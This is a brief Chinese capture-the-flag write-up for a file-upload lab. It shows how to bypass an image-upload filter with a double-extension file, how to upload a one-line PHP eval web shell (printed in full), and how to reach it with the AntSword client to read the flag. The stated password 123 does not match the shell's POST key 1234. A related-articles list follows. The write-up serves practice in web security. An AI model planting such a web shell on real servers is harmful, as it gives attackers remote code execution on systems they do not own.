题目
1.打开靶机
随便上传一个图片,查看get请求发现**/upload/XXX.jpg**
2.创建一个脚本文件
命名为flag.php.jpg,并上传
脚本文件内容:
<?php @eval($_POST[1234])?>
3上传后复制文件get请求的链接并打开蚁剑
连接密码为123
双击链接
4,查找'/'在最下面找到flag文件
5,打开文件得到flag
相关推荐
Coremail邮件安全35 分钟前
寻呼机爆炸,炸醒通讯安全警惕心xuan哈哈哈2 小时前
web基础—dvwa靶场(八)XSSqmx_078 小时前
HTB-Jerry(tomcat war文件、msfvenom)衍生星球15 小时前
【网络安全】对称密码体制掘根15 小时前
【网络】高级IO——poll版本TCP服务器网安加社区17 小时前
国家网络安全宣传周 | 2024年网络安全领域重大政策法规一览weixin_4462608519 小时前
24年蓝桥杯及攻防世界赛题-MISC-3weixin_4462608520 小时前
24年蓝桥杯及攻防世界赛题-MISC-2xuan哈哈哈1 天前
web基础—dvwa靶场(八)SQL Injection(Blind)竹等寒1 天前
Spring框架常见漏洞